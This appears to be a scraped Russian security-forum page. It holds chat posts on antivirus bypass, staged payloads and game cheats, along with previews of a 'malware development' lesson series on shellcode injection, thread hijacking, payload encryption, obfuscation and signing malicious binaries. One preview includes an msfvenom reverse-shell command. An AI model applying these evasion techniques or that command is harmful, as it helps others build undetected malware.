-
НАШИ КОНТАКТЫ:
1)Аккаунт в telegram:https://t.me/XShar22
2)Почта:info@ru-sfera.pw
Наш канал в telegram:https://t.me/ru_sfera
Наша группа VK:https://vk.com/rusfera
Ру-Сфера: Исследование защиты и обсуждение IT-безопасности
Основной чат
-
@
X-Shar:
Идея есть, но готовая процентов на 70%, идея посвящена обходу АВ, но незнаю на сколько подойдет для конкурса, по следующим причинам:gesttototot сказал(а):
1. В сети в разных вариантах уже есть наработки, вот я хочу эти наработки объединить в один проект, в итоге будет около 80% стороннего кода и где-то 20% моего.
2.Проект будет написан на Си, вот незнаю сколько людей на нём кодит сейчас в части комерса малвари.
3.Нужно ещё статью подготовить, проект больше будет в исследовательских целях.
Но всё-равно как сделаю попробую выложить, не понравится и ладно, в целом ничего не теряю.)Потом на гитхаб выложу.))) -
G (Гость) guesttototot:X-Shar сказал(а):
1. На мой взгляд, 20% - тоже работа, все таки ты приложил руку, не знаю с чистого нуля ли там обязательно надо писать, но можно спросить у Тохи в ветке, ответит.
2. Это абсолютно не важно, прицел больше на пользу
3. Конкретно для того конкурса, достаточно развернутого ридми
Ну а с такой темой, уже и на призовое можно рассчитывать)) мой голос будет за тебя)) -
D @ DXZALEET:Ну штож ребятки, решил я тут попробовать накатать что то напоминающее чит для Раста и использованием DMA и Python. Интересно есть ли тут единомышленники? Может кто то хочет попробовать себя в подобном? Знания питона есть, работал с небольшим количеством библиотек. Писал спамеры, парсеры для вк. 19 лет. Желательно что бы Вы уже имели опыт работы с DMA или хотя бы с Rust-ом. Буду рад любым предложениям в лс форума.
-
Б (Гость) бюджетный:Привет! Аккаунт в временном блоке из-за ошибок ввода пароля. Скоро начну писать статью
-
O @ offsec:Я вот щас экспериментирую, пытаюсь отказаться от Stage payload'ов, но не хочет оно работать) SMB - Не получилось, TCP - не получилось, что интересно HTTP Работает нормально. Ничего не понимаю - как это. Посмотрел - порт не занят. Антивирус я думаю понятно что отключен. Может сталкивался кто?
-
O @ offsec:Судя по тому как я понял: На начальных этапах(эксплуатации) мне нужно другой тулзой провести начальный доступ(с помощью metasploit), потом, если нужно, я провожу tcp бекон с выключенным stag'ингом. Т.е что все работало то ли надо передавать payload через метерпретер/etc.. то ли надо забить и просто с включенным staged пейлоадом(хотя здесь проблема: Из за этого оно садится АВ как не в себе). Прикол. Ну в принципе, Коба она же как пост-экслуатейшен тул)
Уроки Разработка вирусов-17.Изучаем технику Thread Hijacking
Thread Hijacking (Похищение потока) - это техника, позволяющая выполнять полезную нагрузку без создания нового потока. Этот метод работает путем приостановки потока и обновления регистра адреса команды, указывающего на следующую инструкцию в памяти, чтобы он указывал на начало полезной нагрузки. Когда поток возобновляет выполнение, выполняется полезная нагрузка.
В этой статье будем использовать Msfvenom TCP reverse shell payload, а не полезную нагрузку calc., потому что она сохраняет поток после выполнения, тогда как полезная нагрузка calc завершила бы поток после выполнения.
Тем не менее, обе полезные нагрузки работают, но сохранение потока после выполнения позволяет проводить дальнейший анализ.
Контекст Потока
Прежде чем можно объяснить эту технику, необходимо понять что такое контекст потока. У каждого потока есть приоритет планирования и он содержит ряд структур, которые система сохраняет...
Уроки Разработка вирусов-16.Разборка с цифровой подписью зверька
Когда пользователь пытается загрузить исполняемый файл из интернета, он часто подписан компанией как способ доказать пользователю, что это надежный исполняемый файл.
Несмотря на то что системы безопасности все равно будут проверять исполняемый файл, на него была бы направлена дополнительная проверка, если бы бинарный файл не был подписан.
Предлагаю рассмотреть шаги, необходимые для подписания вредоносного бинарного файла, что может повысить его надежность.
В статье демонстрируется подписание бинарного файла на исполняемом файле, созданном через Msfvenom: msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o mybin.exe
Тест, как подпись влияет на детект:
Перед началом бинарный файл был загружен на VirusTotal, чтобы увидеть степень обнаружения до подписания бинарного файла.
Степень обнаружения довольно высока: 52 из 71 антивирусов отметили файл как вредоносный...
Уроки Разработка малвари-14. Размещаем Payload удаленно на сервере
На протяжении всех статей до сих пор payload был постоянно хранящимся непосредственно внутри бинарного файла.
Это быстрый и часто используемый метод для извлечения payload. К сожалению, в некоторых случаях, когда существуют ограничения по размеру payload, сохранение payload внутри кода не является осуществимым подходом. Альтернативный подход заключается в размещении payload на веб-сервере и его извлечении во время выполнения.
Настройка Веб-сервера
Эта статья требует веб-сервера для размещения файла payload. Самый простой способ - использовать HTTP-сервер Python с помощью следующей команды:
Обратите внимание, что файл payload должен быть размещен в той же директории, где выполняется эта команда.
Чтобы проверить работу веб-сервера, перейдите по адресу с использованием браузера.
[ATTACH type="full"...
Это быстрый и часто используемый метод для извлечения payload. К сожалению, в некоторых случаях, когда существуют ограничения по размеру payload, сохранение payload внутри кода не является осуществимым подходом. Альтернативный подход заключается в размещении payload на веб-сервере и его извлечении во время выполнения.
Настройка Веб-сервера
Эта статья требует веб-сервера для размещения файла payload. Самый простой способ - использовать HTTP-сервер Python с помощью следующей команды:
Код:
python -m http.server 8000Обратите внимание, что файл payload должен быть размещен в той же директории, где выполняется эта команда.
Чтобы проверить работу веб-сервера, перейдите по адресу с использованием браузера.
[ATTACH type="full"...
Уроки Разработка малвари-13.Инъекция шелл-кода в процесс
Эта статья похожа на предыдущую DLL Injection с небольшими изменениями.
Инъекция shellcode в процесс будет использовать практически те же самые API Windows.
VirtualAllocEx - выделение памяти.
WriteProcessMemory - запись полезной нагрузки в удаленный процесс.
VirtualProtectEx - изменение защиты памяти.
CreateRemoteThread - выполнение полезной нагрузки через новый поток.
Перечисление процессов
Как и в предыдущей статье, инъекция процесса начинается с перечисления процессов.
Фрагмент кода для перечисления процессов, показанный ниже, уже был объяснен в предыдущей статье.
C:
BOOL GetRemoteProcessHandle(LPWSTR szProcessName, DWORD* dwProcessId, HANDLE* hProcess) {
// Согласно документации:
// Перед вызовом функции Process32First установите член dwSize в sizeof(PROCESSENTRY32).
// Если dwSize не инициализирован...Уроки Разработка малвари-11. Локальный запуск Payload
Предлагаю в этой статье исследовать использование динамических библиотек (DLL) в качестве полезной нагрузки и попробовать загрузить вредоносный файл DLL в текущем процессе.
Создание DLL
Создание DLL просто и может быть выполнено с помощью Visual Studio.
Создайте новый проект, выберите язык программирования C++, а затем выберите Динамически-связанную библиотеку (DLL).
Это создаст код-скелет DLL, который будет изменяться в этой статье.
Если вы хотите освежить свои знания о том, как работают DLL, то можете обратится к этой статье:Уроки - Разработка малвари - 5. Изучаем динамические библиотеки
В этой статье будет использовано диалоговое окно, которое появляется, когда DLL успешно загружена.
Создание диалогового окна можно легко сделать с помощью MessageBox из WinAPI.
Приведенный ниже фрагмент кода будет запускать...
Создание DLL
Создание DLL просто и может быть выполнено с помощью Visual Studio.
Создайте новый проект, выберите язык программирования C++, а затем выберите Динамически-связанную библиотеку (DLL).
Это создаст код-скелет DLL, который будет изменяться в этой статье.
Если вы хотите освежить свои знания о том, как работают DLL, то можете обратится к этой статье:Уроки - Разработка малвари - 5. Изучаем динамические библиотеки
В этой статье будет использовано диалоговое окно, которое появляется, когда DLL успешно загружена.
Создание диалогового окна можно легко сделать с помощью MessageBox из WinAPI.
Приведенный ниже фрагмент кода будет запускать...
Проверка возможностей ChatGPT
Привет мир! Я тут недавно вернулся из очень длительного отпуска, дабы снова сделать что-нибудь интересное или весёлое.
Собственно, начнём как всегда.
Не забывайте, что я всё это проделал лишь ради интереса и в целях обучения!!!
Недавно мне стало скучно, а потому я закупил за 600 рубликов подписку на ChatGPT, только есть одна проблема.
Chat GPT не особо любит Русские IP-шники, а VPN использовать с риском потерять подписку - не очень хочу.
Конкретно по данной причине, я купил не ChatGPT, а ChadGPT.
Ооо этот ChatGPT, в последнее время у всех на слуху, умеет всё, не умеет ничего, посылает всех к херам, пытается захватить контроль над ядерным оружием США и прочие весёлые штуки.
"Мы подключаемся к приоритетной платной версии Chat GPT от OpenAI, дорабатываем ее для России и делаем открытой."
Какие вводные, сразу на главной странице у нас есть такие тексты:
"Доступ к...
Собственно, начнём как всегда.
Не забывайте, что я всё это проделал лишь ради интереса и в целях обучения!!!
Недавно мне стало скучно, а потому я закупил за 600 рубликов подписку на ChatGPT, только есть одна проблема.
Chat GPT не особо любит Русские IP-шники, а VPN использовать с риском потерять подписку - не очень хочу.
Конкретно по данной причине, я купил не ChatGPT, а ChadGPT.
Ооо этот ChatGPT, в последнее время у всех на слуху, умеет всё, не умеет ничего, посылает всех к херам, пытается захватить контроль над ядерным оружием США и прочие весёлые штуки.
"Мы подключаемся к приоритетной платной версии Chat GPT от OpenAI, дорабатываем ее для России и делаем открытой."
Какие вводные, сразу на главной странице у нас есть такие тексты:
"Доступ к...
Уроки Разработка малвари-10. Обфускация Payload
В предыдущих статьях обсуждались вопросы размещения полезной нагрузки и её шифрование.
Но как уже было замечено этого не достаточно для сбития детекта, необходимо обойти ещё детект по поведению и эмуляцию кода.
С детектом по поведению немного сложнее, но детект по эмуляции кода можно обойти как вариант обфускацией этого самого кода.)
Предлагаю в этой статье рассмотреть обфускацию полезной нагрузки, далее уже всё зависит что делает ваша ПО, вообще изначально нужно проектировать софт так, что-бы у него не было подозрительного поведения.
В статье будут рассматриваться три способа обфускации...
Что-бы антивирусу или исследователю кода было хорошо, рекомендуется применять шифрование + несколько методов обфускации в комплексе.)
1)IPv4/IPv6Fuscation - это метод обфускации, при котором байты shellcode преобразуются в строки IPv4 или IPv6. Давайте рассмотрим несколько байтов из shellcode Msfvenom x64 calc и проанализируем, как их можно...
Уроки Разработка малвари-9. Шифруем Payload
В предыдущей статье мы рассмотрели где хранить полезную нагрузку (Payload), но как было сказано в коментарии к статье, для обхода детекта нужно много чего сделать, в частности нужно зашифровать Payload и ещё позаботится об антиэмуляции и скрытия поведения.
В этой статье рассмотрим пока-что как шифровать.)
Шифрование с использованием XOR
Шифрование с использованием XOR является самым простым в использовании и легким в реализации, что делает его популярным выбором для вредоносных программ. Оно быстрее, чем AES и RC4, и не требует дополнительных библиотек или использования API Windows. Кроме того, это симметричный алгоритм шифрования, который позволяет использовать одну и ту же функцию как для шифрования, так и для дешифрования.
Шифрование XOR Приведенный ниже фрагмент кода показывает базовую функцию шифрования XOR...
Уроки Разработка малвари-8. Куда класть нагрузку ?
В этой статье предлагаю поднять тему, куда и как класть нагрузку, он-же Payload.
Разработчик вредоносного ПО имеет несколько вариантов того, где в файле PE можно хранить полезную нагрузку. В зависимости от выбора полезная нагрузка будет находиться в разных разделах файла PE.
Полезные нагрузки могут храниться в одном из следующих разделов PE:
.data
.rdata
.text
.rsrc
Раздел .data
Раздел .data файла PE — это раздел исполняемого файла программы, который содержит инициализированные глобальные и статические переменные. Этот раздел доступен для чтения и записи, что делает его подходящим для зашифрованной полезной нагрузки, которая требует дешифровки во время выполнения.
Если полезная нагрузка является глобальной или локальной переменной, она будет сохранена в разделе .data в зависимости от настроек компилятора.
Приведенный ниже фрагмент кода показывает пример того, как полезная нагрузка хранится в разделе .data.
Код:
#include...Информация Локер в поясе верности)
ИБ-эксперт обнаружил, что неназванный производитель мужских поясов верности раскрывает данные своих пользователей, включая email-адреса, пароли (открытым текстом) домашние адреса, IP-адреса, а в некоторых случаях даже координаты GPS.
Исследователь, пожелавший остаться анонимным, рассказал изданию , что ему удалось получить доступ к базе данных, содержащей записи более 10 000 пользователей. Доступ был получен благодаря двум уязвимостям, о которых специалист уведомил компанию еще 17 июня 2023 года.
Однако журналисты пишут, что производитель поясов верности до сих пор не исправил обнаруженные проблемы и не ответил ни на запросы TechCrunch, ни на сообщения ИБ-специалиста. Журналисты даже связались с хостером компании и тот заверил, что предупредит о проблемах производителя устройств, а также китайский CERT, чтобы те так...
Уроки Разработка малвари-7. Виды детектов
Введение
Системы безопасности используют несколько техник для обнаружения вредоносного программного обеспечения.
Важно понимать, какие методы системы безопасности используют для классификации ПО как вредоносное.
Статическое по сигнатуре обнаружение
Сигнатура - это ряд байтов или строк внутри вредоносного ПО, которые уникально его идентифицируют. Могут указываться и другие условия, такие как имена переменных и импортируемые функции. Как только система безопасности сканирует программу, она пытается сопоставить ее со списком известных правил. Эти правила должны быть предварительно созданы и загружены в систему безопасности.
YARA - это один из инструментов, который используют производители безопасности для создания правил обнаружения. Например, если шелл-код содержит последовательность байтов, которая начинается с ЕС 48 83 Е4 ЕО E8 СО 00 00 00 41 51 41 50 52 51, это можно использовать для обнаружения того, что полезная нагрузка...
Уроки Разработка малвари-6. Процессы Windows
В предыдущих версиях статей, было очень краткое ознакомление каких-то базовых вещей, без которых вообще проблематично вести разработку.
Понятно что этого недостаточно, но какое-то направление может дать.
Думаю это последняя статья, по теории и следующие статьи будут уже предметные, посвященные конкретно малвари...
Что такое процесс Windows?
Процесс Windows - это программа или приложение, выполняющееся на машине с Windows. Процесс может быть запущен как пользователем, так и самой системой. Процесс потребляет ресурсы, такие как память, дисковое пространство и процессорное время, чтобы выполнить задачу.
Потоки процесса
Процессы Windows состоят из одного или нескольких потоков, которые выполняются одновременно. Поток — это набор инструкций, которые могут выполняться независимо в рамках процесса. Потоки внутри процесса могут обмениваться данными. Потоки планируются к выполнению операционной системой и...
Уроки Разработка малвари - 5. Изучаем динамические библиотеки
В этой статье предлагаю рассмотреть создание динамических библиотек, в винде это всем наверное известные DLL.)
И .exe, и .dll файлы считаются исполняемыми файлами, в формате PE, сам PE уже описан много где, нет не времени не желание описывать архитектуру, если интересно всё в сети есть и очень разжованно.)
Что такое DLL?
DLL - это общие библиотеки исполняемых функций или данных, которые могут использоваться несколькими приложениями одновременно. Они используются для экспорта функций, которые будут использоваться процессом. В отличие от EXE файлов, DLL файлы не могут исполнять код самостоятельно. Вместо этого библиотеки DLL необходимо загрузить другими программами для выполнения кода.
Например функция createFile экспортирована из kernel32.dll, поэтому если процесс хочет вызвать эту функцию, ему сначала нужно загрузить kernel32.dll в свое адресное пространство.
Некоторые DLL автоматически загружаются в каждый...
ВАЖНО Блокировка OpenVPN и Wireguard в РФ
В России наблюдается блокировка популярных VPN-протоколов OpenVPN и Wireguard.
К сожалению, мы не можем точно определить, является ли это временной или постоянной мерой.
В связи с этим, как альтернативное и надежное решение, мы настоятельно рекомендуем переустановить ваше VPN-решение на Amnezia и использовать протоколы OpenVPN over Cloak (рекомендуется) или Shadowsocks.
Также работает Outline VPN.
Будет-ли блокировка OpenVPN и Wireguard постоянной покажет время, пока-что многие испытывают проблемы.:(
